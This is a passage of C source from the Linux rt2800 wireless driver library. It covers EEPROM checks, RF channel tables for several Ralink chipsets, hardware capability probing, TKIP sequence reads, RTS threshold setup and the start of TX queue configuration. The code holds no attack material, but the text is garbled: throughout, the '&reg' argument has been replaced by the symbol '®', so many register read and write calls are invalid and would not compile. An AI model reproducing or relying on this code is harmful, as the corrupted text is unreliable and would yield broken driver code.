rt2x00_get_field16(word, EEPROM_RSSI_BG2_LNA_A1) == 0xff)
rt2x00_set_field16(&word, EEPROM_RSSI_BG2_LNA_A1,
default_lna_gain);
}
rt2800_eeprom_write(rt2x00dev, EEPROM_RSSI_BG2, word);
drv_data->txmixer_gain_5g = rt2800_get_txmixer_gain_5g(rt2x00dev);
rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_A, &word);
if (abs(rt2x00_get_field16(word, EEPROM_RSSI_A_OFFSET0)) > 10)
rt2x00_set_field16(&word, EEPROM_RSSI_A_OFFSET0, 0);
if (abs(rt2x00_get_field16(word, EEPROM_RSSI_A_OFFSET1)) > 10)
rt2x00_set_field16(&word, EEPROM_RSSI_A_OFFSET1, 0);
rt2800_eeprom_write(rt2x00dev, EEPROM_RSSI_A, word);
rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_A2, &word);
if (abs(rt2x00_get_field16(word, EEPROM_RSSI_A2_OFFSET2)) > 10)
rt2x00_set_field16(&word, EEPROM_RSSI_A2_OFFSET2, 0);
if (!rt2x00_rt(rt2x00dev, RT3593)) {
if (rt2x00_get_field16(word, EEPROM_RSSI_A2_LNA_A2) == 0x00 ||
rt2x00_get_field16(word, EEPROM_RSSI_A2_LNA_A2) == 0xff)
rt2x00_set_field16(&word, EEPROM_RSSI_A2_LNA_A2,
default_lna_gain);
}
rt2800_eeprom_write(rt2x00dev, EEPROM_RSSI_A2, word);
if (rt2x00_rt(rt2x00dev, RT3593)) {
rt2800_eeprom_read(rt2x00dev, EEPROM_EXT_LNA2, &word);
if (rt2x00_get_field16(word, EEPROM_EXT_LNA2_A1) == 0x00 ||
rt2x00_get_field16(word, EEPROM_EXT_LNA2_A1) == 0xff)
rt2x00_set_field16(&word, EEPROM_EXT_LNA2_A1,
default_lna_gain);
if (rt2x00_get_field16(word, EEPROM_EXT_LNA2_A2) == 0x00 ||
rt2x00_get_field16(word, EEPROM_EXT_LNA2_A2) == 0xff)
rt2x00_set_field16(&word, EEPROM_EXT_LNA2_A1,
default_lna_gain);
rt2800_eeprom_write(rt2x00dev, EEPROM_EXT_LNA2, word);
}
return 0;
}
static int rt2800_init_eeprom(struct rt2x00_dev *rt2x00dev)
{
u16 value;
u16 eeprom;
u16 rf;
/*
* Read EEPROM word for configuration.
*/
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF0, &eeprom);
/*
* Identify RF chipset by EEPROM value
* RT28xx/RT30xx: defined in "EEPROM_NIC_CONF0_RF_TYPE" field
* RT53xx: defined in "EEPROM_CHIP_ID" field
*/
if (rt2x00_rt(rt2x00dev, RT3290) ||
rt2x00_rt(rt2x00dev, RT5390) ||
rt2x00_rt(rt2x00dev, RT5392))
rt2800_eeprom_read(rt2x00dev, EEPROM_CHIP_ID, &rf);
else
rf = rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_RF_TYPE);
switch (rf) {
case RF2820:
case RF2850:
case RF2720:
case RF2750:
case RF3020:
case RF2020:
case RF3021:
case RF3022:
case RF3052:
case RF3053:
case RF3070:
case RF3290:
case RF3320:
case RF3322:
case RF5360:
case RF5362:
case RF5370:
case RF5372:
case RF5390:
case RF5392:
case RF5592:
break;
default:
rt2x00_err(rt2x00dev, "Invalid RF chipset 0x%04x detected\n",
rf);
return -ENODEV;
}
rt2x00_set_rf(rt2x00dev, rf);
/*
* Identify default antenna configuration.
*/
rt2x00dev->default_ant.tx_chain_num =
rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_TXPATH);
rt2x00dev->default_ant.rx_chain_num =
rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_RXPATH);
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1, &eeprom);
if (rt2x00_rt(rt2x00dev, RT3070) ||
rt2x00_rt(rt2x00dev, RT3090) ||
rt2x00_rt(rt2x00dev, RT3352) ||
rt2x00_rt(rt2x00dev, RT3390)) {
value = rt2x00_get_field16(eeprom,
EEPROM_NIC_CONF1_ANT_DIVERSITY);
switch (value) {
case 0:
case 1:
case 2:
rt2x00dev->default_ant.tx = ANTENNA_A;
rt2x00dev->default_ant.rx = ANTENNA_A;
break;
case 3:
rt2x00dev->default_ant.tx = ANTENNA_A;
rt2x00dev->default_ant.rx = ANTENNA_B;
break;
}
} else {
rt2x00dev->default_ant.tx = ANTENNA_A;
rt2x00dev->default_ant.rx = ANTENNA_A;
}
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390R)) {
rt2x00dev->default_ant.tx = ANTENNA_HW_DIVERSITY; /* Unused */
rt2x00dev->default_ant.rx = ANTENNA_HW_DIVERSITY; /* Unused */
}
/*
* Determine external LNA informations.
*/
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_EXTERNAL_LNA_5G))
__set_bit(CAPABILITY_EXTERNAL_LNA_A, &rt2x00dev->cap_flags);
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_EXTERNAL_LNA_2G))
__set_bit(CAPABILITY_EXTERNAL_LNA_BG, &rt2x00dev->cap_flags);
/*
* Detect if this device has an hardware controlled radio.
*/
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_HW_RADIO))
__set_bit(CAPABILITY_HW_BUTTON, &rt2x00dev->cap_flags);
/*
* Detect if this device has Bluetooth co-existence.
*/
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_BT_COEXIST))
__set_bit(CAPABILITY_BT_COEXIST, &rt2x00dev->cap_flags);
/*
* Read frequency offset and RF programming sequence.
*/
rt2800_eeprom_read(rt2x00dev, EEPROM_FREQ, &eeprom);
rt2x00dev->freq_offset = rt2x00_get_field16(eeprom, EEPROM_FREQ_OFFSET);
/*
* Store led settings, for correct led behaviour.
*/
#ifdef CPTCFG_RT2X00_LIB_LEDS
rt2800_init_led(rt2x00dev, &rt2x00dev->led_radio, LED_TYPE_RADIO);
rt2800_init_led(rt2x00dev, &rt2x00dev->led_assoc, LED_TYPE_ASSOC);
rt2800_init_led(rt2x00dev, &rt2x00dev->led_qual, LED_TYPE_QUALITY);
rt2x00dev->led_mcu_reg = eeprom;
#endif /* CPTCFG_RT2X00_LIB_LEDS */
/*
* Check if support EIRP tx power limit feature.
*/
rt2800_eeprom_read(rt2x00dev, EEPROM_EIRP_MAX_TX_POWER, &eeprom);
if (rt2x00_get_field16(eeprom, EEPROM_EIRP_MAX_TX_POWER_2GHZ) <
EIRP_MAX_TX_POWER_LIMIT)
__set_bit(CAPABILITY_POWER_LIMIT, &rt2x00dev->cap_flags);
return 0;
}
/*
* RF value list for rt28xx
* Supports: 2.4 GHz (all) & 5.2 GHz (RF2850 & RF2750)
*/
static const struct rf_channel rf_vals[] = {
{ 1, 0x18402ecc, 0x184c0786, 0x1816b455, 0x1800510b },
{ 2, 0x18402ecc, 0x184c0786, 0x18168a55, 0x1800519f },
{ 3, 0x18402ecc, 0x184c078a, 0x18168a55, 0x1800518b },
{ 4, 0x18402ecc, 0x184c078a, 0x18168a55, 0x1800519f },
{ 5, 0x18402ecc, 0x184c078e, 0x18168a55, 0x1800518b },
{ 6, 0x18402ecc, 0x184c078e, 0x18168a55, 0x1800519f },
{ 7, 0x18402ecc, 0x184c0792, 0x18168a55, 0x1800518b },
{ 8, 0x18402ecc, 0x184c0792, 0x18168a55, 0x1800519f },
{ 9, 0x18402ecc, 0x184c0796, 0x18168a55, 0x1800518b },
{ 10, 0x18402ecc, 0x184c0796, 0x18168a55, 0x1800519f },
{ 11, 0x18402ecc, 0x184c079a, 0x18168a55, 0x1800518b },
{ 12, 0x18402ecc, 0x184c079a, 0x18168a55, 0x1800519f },
{ 13, 0x18402ecc, 0x184c079e, 0x18168a55, 0x1800518b },
{ 14, 0x18402ecc, 0x184c07a2, 0x18168a55, 0x18005193 },
/* 802.11 UNI / HyperLan 2 */
{ 36, 0x18402ecc, 0x184c099a, 0x18158a55, 0x180ed1a3 },
{ 38, 0x18402ecc, 0x184c099e, 0x18158a55, 0x180ed193 },
{ 40, 0x18402ec8, 0x184c0682, 0x18158a55, 0x180ed183 },
{ 44, 0x18402ec8, 0x184c0682, 0x18158a55, 0x180ed1a3 },
{ 46, 0x18402ec8, 0x184c0686, 0x18158a55, 0x180ed18b },
{ 48, 0x18402ec8, 0x184c0686, 0x18158a55, 0x180ed19b },
{ 52, 0x18402ec8, 0x184c068a, 0x18158a55, 0x180ed193 },
{ 54, 0x18402ec8, 0x184c068a, 0x18158a55, 0x180ed1a3 },
{ 56, 0x18402ec8, 0x184c068e, 0x18158a55, 0x180ed18b },
{ 60, 0x18402ec8, 0x184c0692, 0x18158a55, 0x180ed183 },
{ 62, 0x18402ec8, 0x184c0692, 0x18158a55, 0x180ed193 },
{ 64, 0x18402ec8, 0x184c0692, 0x18158a55, 0x180ed1a3 },
/* 802.11 HyperLan 2 */
{ 100, 0x18402ec8, 0x184c06b2, 0x18178a55, 0x180ed783 },
{ 102, 0x18402ec8, 0x184c06b2, 0x18578a55, 0x180ed793 },
{ 104, 0x18402ec8, 0x185c06b2, 0x18578a55, 0x180ed1a3 },
{ 108, 0x18402ecc, 0x185c0a32, 0x18578a55, 0x180ed193 },
{ 110, 0x18402ecc, 0x184c0a36, 0x18178a55, 0x180ed183 },
{ 112, 0x18402ecc, 0x184c0a36, 0x18178a55, 0x180ed19b },
{ 116, 0x18402ecc, 0x184c0a3a, 0x18178a55, 0x180ed1a3 },
{ 118, 0x18402ecc, 0x184c0a3e, 0x18178a55, 0x180ed193 },
{ 120, 0x18402ec4, 0x184c0382, 0x18178a55, 0x180ed183 },
{ 124, 0x18402ec4, 0x184c0382, 0x18178a55, 0x180ed193 },
{ 126, 0x18402ec4, 0x184c0382, 0x18178a55, 0x180ed15b },
{ 128, 0x18402ec4, 0x184c0382, 0x18178a55, 0x180ed1a3 },
{ 132, 0x18402ec4, 0x184c0386, 0x18178a55, 0x180ed18b },
{ 134, 0x18402ec4, 0x184c0386, 0x18178a55, 0x180ed193 },
{ 136, 0x18402ec4, 0x184c0386, 0x18178a55, 0x180ed19b },
{ 140, 0x18402ec4, 0x184c038a, 0x18178a55, 0x180ed183 },
/* 802.11 UNII */
{ 149, 0x18402ec4, 0x184c038a, 0x18178a55, 0x180ed1a7 },
{ 151, 0x18402ec4, 0x184c038e, 0x18178a55, 0x180ed187 },
{ 153, 0x18402ec4, 0x184c038e, 0x18178a55, 0x180ed18f },
{ 157, 0x18402ec4, 0x184c038e, 0x18178a55, 0x180ed19f },
{ 159, 0x18402ec4, 0x184c038e, 0x18178a55, 0x180ed1a7 },
{ 161, 0x18402ec4, 0x184c0392, 0x18178a55, 0x180ed187 },
{ 165, 0x18402ec4, 0x184c0392, 0x18178a55, 0x180ed197 },
{ 167, 0x18402ec4, 0x184c03d2, 0x18179855, 0x1815531f },
{ 169, 0x18402ec4, 0x184c03d2, 0x18179855, 0x18155327 },
{ 171, 0x18402ec4, 0x184c03d6, 0x18179855, 0x18155307 },
{ 173, 0x18402ec4, 0x184c03d6, 0x18179855, 0x1815530f },
/* 802.11 Japan */
{ 184, 0x15002ccc, 0x1500491e, 0x1509be55, 0x150c0a0b },
{ 188, 0x15002ccc, 0x15004922, 0x1509be55, 0x150c0a13 },
{ 192, 0x15002ccc, 0x15004926, 0x1509be55, 0x150c0a1b },
{ 196, 0x15002ccc, 0x1500492a, 0x1509be55, 0x150c0a23 },
{ 208, 0x15002ccc, 0x1500493a, 0x1509be55, 0x150c0a13 },
{ 212, 0x15002ccc, 0x1500493e, 0x1509be55, 0x150c0a1b },
{ 216, 0x15002ccc, 0x15004982, 0x1509be55, 0x150c0a23 },
};
/*
* RF value list for rt3xxx
* Supports: 2.4 GHz (all) & 5.2 GHz (RF3052 & RF3053)
*/
static const struct rf_channel rf_vals_3x[] = {
{1, 241, 2, 2 },
{2, 241, 2, 7 },
{3, 242, 2, 2 },
{4, 242, 2, 7 },
{5, 243, 2, 2 },
{6, 243, 2, 7 },
{7, 244, 2, 2 },
{8, 244, 2, 7 },
{9, 245, 2, 2 },
{10, 245, 2, 7 },
{11, 246, 2, 2 },
{12, 246, 2, 7 },
{13, 247, 2, 2 },
{14, 248, 2, 4 },
/* 802.11 UNI / HyperLan 2 */
{36, 0x56, 0, 4},
{38, 0x56, 0, 6},
{40, 0x56, 0, 8},
{44, 0x57, 0, 0},
{46, 0x57, 0, 2},
{48, 0x57, 0, 4},
{52, 0x57, 0, 8},
{54, 0x57, 0, 10},
{56, 0x58, 0, 0},
{60, 0x58, 0, 4},
{62, 0x58, 0, 6},
{64, 0x58, 0, 8},
/* 802.11 HyperLan 2 */
{100, 0x5b, 0, 8},
{102, 0x5b, 0, 10},
{104, 0x5c, 0, 0},
{108, 0x5c, 0, 4},
{110, 0x5c, 0, 6},
{112, 0x5c, 0, 8},
{116, 0x5d, 0, 0},
{118, 0x5d, 0, 2},
{120, 0x5d, 0, 4},
{124, 0x5d, 0, 8},
{126, 0x5d, 0, 10},
{128, 0x5e, 0, 0},
{132, 0x5e, 0, 4},
{134, 0x5e, 0, 6},
{136, 0x5e, 0, 8},
{140, 0x5f, 0, 0},
/* 802.11 UNII */
{149, 0x5f, 0, 9},
{151, 0x5f, 0, 11},
{153, 0x60, 0, 1},
{157, 0x60, 0, 5},
{159, 0x60, 0, 7},
{161, 0x60, 0, 9},
{165, 0x61, 0, 1},
{167, 0x61, 0, 3},
{169, 0x61, 0, 5},
{171, 0x61, 0, 7},
{173, 0x61, 0, 9},
};
static const struct rf_channel rf_vals_5592_xtal20[] = {
/* Channel, N, K, mod, R */
{1, 482, 4, 10, 3},
{2, 483, 4, 10, 3},
{3, 484, 4, 10, 3},
{4, 485, 4, 10, 3},
{5, 486, 4, 10, 3},
{6, 487, 4, 10, 3},
{7, 488, 4, 10, 3},
{8, 489, 4, 10, 3},
{9, 490, 4, 10, 3},
{10, 491, 4, 10, 3},
{11, 492, 4, 10, 3},
{12, 493, 4, 10, 3},
{13, 494, 4, 10, 3},
{14, 496, 8, 10, 3},
{36, 172, 8, 12, 1},
{38, 173, 0, 12, 1},
{40, 173, 4, 12, 1},
{42, 173, 8, 12, 1},
{44, 174, 0, 12, 1},
{46, 174, 4, 12, 1},
{48, 174, 8, 12, 1},
{50, 175, 0, 12, 1},
{52, 175, 4, 12, 1},
{54, 175, 8, 12, 1},
{56, 176, 0, 12, 1},
{58, 176, 4, 12, 1},
{60, 176, 8, 12, 1},
{62, 177, 0, 12, 1},
{64, 177, 4, 12, 1},
{100, 183, 4, 12, 1},
{102, 183, 8, 12, 1},
{104, 184, 0, 12, 1},
{106, 184, 4, 12, 1},
{108, 184, 8, 12, 1},
{110, 185, 0, 12, 1},
{112, 185, 4, 12, 1},
{114, 185, 8, 12, 1},
{116, 186, 0, 12, 1},
{118, 186, 4, 12, 1},
{120, 186, 8, 12, 1},
{122, 187, 0, 12, 1},
{124, 187, 4, 12, 1},
{126, 187, 8, 12, 1},
{128, 188, 0, 12, 1},
{130, 188, 4, 12, 1},
{132, 188, 8, 12, 1},
{134, 189, 0, 12, 1},
{136, 189, 4, 12, 1},
{138, 189, 8, 12, 1},
{140, 190, 0, 12, 1},
{149, 191, 6, 12, 1},
{151, 191, 10, 12, 1},
{153, 192, 2, 12, 1},
{155, 192, 6, 12, 1},
{157, 192, 10, 12, 1},
{159, 193, 2, 12, 1},
{161, 193, 6, 12, 1},
{165, 194, 2, 12, 1},
{184, 164, 0, 12, 1},
{188, 164, 4, 12, 1},
{192, 165, 8, 12, 1},
{196, 166, 0, 12, 1},
};
static const struct rf_channel rf_vals_5592_xtal40[] = {
/* Channel, N, K, mod, R */
{1, 241, 2, 10, 3},
{2, 241, 7, 10, 3},
{3, 242, 2, 10, 3},
{4, 242, 7, 10, 3},
{5, 243, 2, 10, 3},
{6, 243, 7, 10, 3},
{7, 244, 2, 10, 3},
{8, 244, 7, 10, 3},
{9, 245, 2, 10, 3},
{10, 245, 7, 10, 3},
{11, 246, 2, 10, 3},
{12, 246, 7, 10, 3},
{13, 247, 2, 10, 3},
{14, 248, 4, 10, 3},
{36, 86, 4, 12, 1},
{38, 86, 6, 12, 1},
{40, 86, 8, 12, 1},
{42, 86, 10, 12, 1},
{44, 87, 0, 12, 1},
{46, 87, 2, 12, 1},
{48, 87, 4, 12, 1},
{50, 87, 6, 12, 1},
{52, 87, 8, 12, 1},
{54, 87, 10, 12, 1},
{56, 88, 0, 12, 1},
{58, 88, 2, 12, 1},
{60, 88, 4, 12, 1},
{62, 88, 6, 12, 1},
{64, 88, 8, 12, 1},
{100, 91, 8, 12, 1},
{102, 91, 10, 12, 1},
{104, 92, 0, 12, 1},
{106, 92, 2, 12, 1},
{108, 92, 4, 12, 1},
{110, 92, 6, 12, 1},
{112, 92, 8, 12, 1},
{114, 92, 10, 12, 1},
{116, 93, 0, 12, 1},
{118, 93, 2, 12, 1},
{120, 93, 4, 12, 1},
{122, 93, 6, 12, 1},
{124, 93, 8, 12, 1},
{126, 93, 10, 12, 1},
{128, 94, 0, 12, 1},
{130, 94, 2, 12, 1},
{132, 94, 4, 12, 1},
{134, 94, 6, 12, 1},
{136, 94, 8, 12, 1},
{138, 94, 10, 12, 1},
{140, 95, 0, 12, 1},
{149, 95, 9, 12, 1},
{151, 95, 11, 12, 1},
{153, 96, 1, 12, 1},
{155, 96, 3, 12, 1},
{157, 96, 5, 12, 1},
{159, 96, 7, 12, 1},
{161, 96, 9, 12, 1},
{165, 97, 1, 12, 1},
{184, 82, 0, 12, 1},
{188, 82, 4, 12, 1},
{192, 82, 8, 12, 1},
{196, 83, 0, 12, 1},
};
static int rt2800_probe_hw_mode(struct rt2x00_dev *rt2x00dev)
{
struct hw_mode_spec *spec = &rt2x00dev->spec;
struct channel_info *info;
char *default_power1;
char *default_power2;
char *default_power3;
unsigned int i;
u32 reg;
/*
* Disable powersaving as default.
*/
rt2x00dev->hw->wiphy->flags &= ~WIPHY_FLAG_PS_ON_BY_DEFAULT;
/*
* Initialize all hw fields.
*/
ieee80211_hw_set(rt2x00dev->hw, SUPPORTS_HT_CCK_RATES);
ieee80211_hw_set(rt2x00dev->hw, REPORTS_TX_ACK_STATUS);
ieee80211_hw_set(rt2x00dev->hw, AMPDU_AGGREGATION);
ieee80211_hw_set(rt2x00dev->hw, PS_NULLFUNC_STACK);
ieee80211_hw_set(rt2x00dev->hw, SIGNAL_DBM);
ieee80211_hw_set(rt2x00dev->hw, SUPPORTS_PS);
/*
* Don't set IEEE80211_HW_HOST_BROADCAST_PS_BUFFERING for USB devices
* unless we are capable of sending the buffered frames out after the
* DTIM transmission using rt2x00lib_beacondone. This will send out
* multicast and broadcast traffic immediately instead of buffering it
* infinitly and thus dropping it after some time.
*/
if (!rt2x00_is_usb(rt2x00dev))
ieee80211_hw_set(rt2x00dev->hw, HOST_BROADCAST_PS_BUFFERING);
SET_IEEE80211_DEV(rt2x00dev->hw, rt2x00dev->dev);
SET_IEEE80211_PERM_ADDR(rt2x00dev->hw,
rt2800_eeprom_addr(rt2x00dev,
EEPROM_MAC_ADDR_0));
/*
* As rt2800 has a global fallback table we cannot specify
* more then one tx rate per frame but since the hw will
* try several rates (based on the fallback table) we should
* initialize max_report_rates to the maximum number of rates
* we are going to try. Otherwise mac80211 will truncate our
* reported tx rates and the rc algortihm will end up with
* incorrect data.
*/
rt2x00dev->hw->max_rates = 1;
rt2x00dev->hw->max_report_rates = 7;
rt2x00dev->hw->max_rate_tries = 1;
/*
* Initialize hw_mode information.
*/
spec->supported_rates = SUPPORT_RATE_CCK | SUPPORT_RATE_OFDM;
switch (rt2x00dev->chip.rf) {
case RF2720:
case RF2820:
spec->num_channels = 14;
spec->channels = rf_vals;
break;
case RF2750:
case RF2850:
spec->num_channels = ARRAY_SIZE(rf_vals);
spec->channels = rf_vals;
break;
case RF2020:
case RF3020:
case RF3021:
case RF3022:
case RF3070:
case RF3290:
case RF3320:
case RF3322:
case RF5360:
case RF5362:
case RF5370:
case RF5372:
case RF5390:
case RF5392:
spec->num_channels = 14;
spec->channels = rf_vals_3x;
break;
case RF3052:
case RF3053:
spec->num_channels = ARRAY_SIZE(rf_vals_3x);
spec->channels = rf_vals_3x;
break;
case RF5592:
rt2800_register_read(rt2x00dev, MAC_DEBUG_INDEX, ®);
if (rt2x00_get_field32(reg, MAC_DEBUG_INDEX_XTAL)) {
spec->num_channels = ARRAY_SIZE(rf_vals_5592_xtal40);
spec->channels = rf_vals_5592_xtal40;
} else {
spec->num_channels = ARRAY_SIZE(rf_vals_5592_xtal20);
spec->channels = rf_vals_5592_xtal20;
}
break;
}
if (WARN_ON_ONCE(!spec->channels))
return -ENODEV;
spec->supported_bands = SUPPORT_BAND_2GHZ;
if (spec->num_channels > 14)
spec->supported_bands |= SUPPORT_BAND_5GHZ;
/*
* Initialize HT information.
*/
if (!rt2x00_rf(rt2x00dev, RF2020))
spec->ht.ht_supported = true;
else
spec->ht.ht_supported = false;
spec->ht.cap =
IEEE80211_HT_CAP_SUP_WIDTH_20_40 |
IEEE80211_HT_CAP_GRN_FLD |
IEEE80211_HT_CAP_SGI_20 |
IEEE80211_HT_CAP_SGI_40;
if (rt2x00dev->default_ant.tx_chain_num >= 2)
spec->ht.cap |= IEEE80211_HT_CAP_TX_STBC;
spec->ht.cap |= rt2x00dev->default_ant.rx_chain_num <<
IEEE80211_HT_CAP_RX_STBC_SHIFT;
spec->ht.ampdu_factor = 3;
spec->ht.ampdu_density = 4;
spec->ht.mcs.tx_params =
IEEE80211_HT_MCS_TX_DEFINED |
IEEE80211_HT_MCS_TX_RX_DIFF |
((rt2x00dev->default_ant.tx_chain_num - 1) <<
IEEE80211_HT_MCS_TX_MAX_STREAMS_SHIFT);
switch (rt2x00dev->default_ant.rx_chain_num) {
case 3:
spec->ht.mcs.rx_mask[2] = 0xff;
case 2:
spec->ht.mcs.rx_mask[1] = 0xff;
case 1:
spec->ht.mcs.rx_mask[0] = 0xff;
spec->ht.mcs.rx_mask[4] = 0x1; /* MCS32 */
break;
}
/*
* Create channel information array
*/
info = kcalloc(spec->num_channels, sizeof(*info), GFP_KERNEL);
if (!info)
return -ENOMEM;
spec->channels_info = info;
default_power1 = rt2800_eeprom_addr(rt2x00dev, EEPROM_TXPOWER_BG1);
default_power2 = rt2800_eeprom_addr(rt2x00dev, EEPROM_TXPOWER_BG2);
if (rt2x00dev->default_ant.tx_chain_num > 2)
default_power3 = rt2800_eeprom_addr(rt2x00dev,
EEPROM_EXT_TXPOWER_BG3);
else
default_power3 = NULL;
for (i = 0; i < 14; i++) {
info[i].default_power1 = default_power1[i];
info[i].default_power2 = default_power2[i];
if (default_power3)
info[i].default_power3 = default_power3[i];
}
if (spec->num_channels > 14) {
default_power1 = rt2800_eeprom_addr(rt2x00dev,
EEPROM_TXPOWER_A1);
default_power2 = rt2800_eeprom_addr(rt2x00dev,
EEPROM_TXPOWER_A2);
if (rt2x00dev->default_ant.tx_chain_num > 2)
default_power3 =
rt2800_eeprom_addr(rt2x00dev,
EEPROM_EXT_TXPOWER_A3);
else
default_power3 = NULL;
for (i = 14; i < spec->num_channels; i++) {
info[i].default_power1 = default_power1[i - 14];
info[i].default_power2 = default_power2[i - 14];
if (default_power3)
info[i].default_power3 = default_power3[i - 14];
}
}
switch (rt2x00dev->chip.rf) {
case RF2020:
case RF3020:
case RF3021:
case RF3022:
case RF3320:
case RF3052:
case RF3053:
case RF3070:
case RF3290:
case RF5360:
case RF5362:
case RF5370:
case RF5372:
case RF5390:
case RF5392:
__set_bit(CAPABILITY_VCO_RECALIBRATION, &rt2x00dev->cap_flags);
break;
}
return 0;
}
static int rt2800_probe_rt(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
u32 rt;
u32 rev;
if (rt2x00_rt(rt2x00dev, RT3290))
rt2800_register_read(rt2x00dev, MAC_CSR0_3290, ®);
else
rt2800_register_read(rt2x00dev, MAC_CSR0, ®);
rt = rt2x00_get_field32(reg, MAC_CSR0_CHIPSET);
rev = rt2x00_get_field32(reg, MAC_CSR0_REVISION);
switch (rt) {
case RT2860:
case RT2872:
case RT2883:
case RT3070:
case RT3071:
case RT3090:
case RT3290:
case RT3352:
case RT3390:
case RT3572:
case RT3593:
case RT5390:
case RT5392:
case RT5592:
break;
default:
rt2x00_err(rt2x00dev, "Invalid RT chipset 0x%04x, rev %04x detected\n",
rt, rev);
return -ENODEV;
}
rt2x00_set_rt(rt2x00dev, rt, rev);
return 0;
}
int rt2800_probe_hw(struct rt2x00_dev *rt2x00dev)
{
int retval;
u32 reg;
retval = rt2800_probe_rt(rt2x00dev);
if (retval)
return retval;
/*
* Allocate eeprom data.
*/
retval = rt2800_validate_eeprom(rt2x00dev);
if (retval)
return retval;
retval = rt2800_init_eeprom(rt2x00dev);
if (retval)
return retval;
/*
* Enable rfkill polling by setting GPIO direction of the
* rfkill switch GPIO pin correctly.
*/
rt2800_register_read(rt2x00dev, GPIO_CTRL, ®);
rt2x00_set_field32(®, GPIO_CTRL_DIR2, 1);
rt2800_register_write(rt2x00dev, GPIO_CTRL, reg);
/*
* Initialize hw specifications.
*/
retval = rt2800_probe_hw_mode(rt2x00dev);
if (retval)
return retval;
/*
* Set device capabilities.
*/
__set_bit(CAPABILITY_CONTROL_FILTERS, &rt2x00dev->cap_flags);
__set_bit(CAPABILITY_CONTROL_FILTER_PSPOLL, &rt2x00dev->cap_flags);
if (!rt2x00_is_usb(rt2x00dev))
__set_bit(CAPABILITY_PRE_TBTT_INTERRUPT, &rt2x00dev->cap_flags);
/*
* Set device requirements.
*/
if (!rt2x00_is_soc(rt2x00dev))
__set_bit(REQUIRE_FIRMWARE, &rt2x00dev->cap_flags);
__set_bit(REQUIRE_L2PAD, &rt2x00dev->cap_flags);
__set_bit(REQUIRE_TXSTATUS_FIFO, &rt2x00dev->cap_flags);
if (!rt2800_hwcrypt_disabled(rt2x00dev))
__set_bit(CAPABILITY_HW_CRYPTO, &rt2x00dev->cap_flags);
__set_bit(CAPABILITY_LINK_TUNING, &rt2x00dev->cap_flags);
__set_bit(REQUIRE_HT_TX_DESC, &rt2x00dev->cap_flags);
if (rt2x00_is_usb(rt2x00dev))
__set_bit(REQUIRE_PS_AUTOWAKE, &rt2x00dev->cap_flags);
else {
__set_bit(REQUIRE_DMA, &rt2x00dev->cap_flags);
__set_bit(REQUIRE_TASKLET_CONTEXT, &rt2x00dev->cap_flags);
}
/*
* Set the rssi offset.
*/
rt2x00dev->rssi_offset = DEFAULT_RSSI_OFFSET;
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_probe_hw);
/*
* IEEE80211 stack callback functions.
*/
void rt2800_get_key_seq(struct ieee80211_hw *hw,
struct ieee80211_key_conf *key,
struct ieee80211_key_seq *seq)
{
struct rt2x00_dev *rt2x00dev = hw->priv;
struct mac_iveiv_entry iveiv_entry;
u32 offset;
if (key->cipher != WLAN_CIPHER_SUITE_TKIP)
return;
offset = MAC_IVEIV_ENTRY(key->hw_key_idx);
rt2800_register_multiread(rt2x00dev, offset,
&iveiv_entry, sizeof(iveiv_entry));
memcpy(&seq->tkip.iv16, &iveiv_entry.iv[0], 2);
memcpy(&seq->tkip.iv32, &iveiv_entry.iv[4], 4);
}
EXPORT_SYMBOL_GPL(rt2800_get_key_seq);
int rt2800_set_rts_threshold(struct ieee80211_hw *hw, u32 value)
{
struct rt2x00_dev *rt2x00dev = hw->priv;
u32 reg;
bool enabled = (value < IEEE80211_MAX_RTS_THRESHOLD);
rt2800_register_read(rt2x00dev, TX_RTS_CFG, ®);
rt2x00_set_field32(®, TX_RTS_CFG_RTS_THRES, value);
rt2800_register_write(rt2x00dev, TX_RTS_CFG, reg);
rt2800_register_read(rt2x00dev, CCK_PROT_CFG, ®);
rt2x00_set_field32(®, CCK_PROT_CFG_RTS_TH_EN, enabled);
rt2800_register_write(rt2x00dev, CCK_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, OFDM_PROT_CFG, ®);
rt2x00_set_field32(®, OFDM_PROT_CFG_RTS_TH_EN, enabled);
rt2800_register_write(rt2x00dev, OFDM_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, MM20_PROT_CFG, ®);
rt2x00_set_field32(®, MM20_PROT_CFG_RTS_TH_EN, enabled);
rt2800_register_write(rt2x00dev, MM20_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, MM40_PROT_CFG, ®);
rt2x00_set_field32(®, MM40_PROT_CFG_RTS_TH_EN, enabled);
rt2800_register_write(rt2x00dev, MM40_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, GF20_PROT_CFG, ®);
rt2x00_set_field32(®, GF20_PROT_CFG_RTS_TH_EN, enabled);
rt2800_register_write(rt2x00dev, GF20_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, GF40_PROT_CFG, ®);
rt2x00_set_field32(®, GF40_PROT_CFG_RTS_TH_EN, enabled);
rt2800_register_write(rt2x00dev, GF40_PROT_CFG, reg);
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_set_rts_threshold);
int rt2800_conf_tx(struct ieee80211_hw *hw,
struct ieee80211_vif *vif, u16 queue_idx,
const struct ieee80211_tx_queue_params *params)
{
struct rt2x00_dev *rt2x00dev = hw->priv;
struct data_queue *queue;
struct rt2x00_field32 field;
int retval;
u32 reg;
u32 offset;
/*
* First pass the configuration through rt2x00lib, that will
* update the queue settings and validate the input. After that
* we are free to update the registers based on the value
* in the queue parameter.
*/
retval = rt2x00mac_conf_tx(hw, vif, queue_idx, params);
if (retval)
return retval;
/*
* We only need to perform additional register initialization
* for WMM queues/
*/
if (queue_idx >= 4)
return 0;
queue = rt2x00queue_get_tx_queue(rt2x00dev, queue_idx);
/* Update WMM TXOP register */
offset = WMM_TXOP0_CFG + (sizeof(u32) * (!!(queue_idx & 2)));
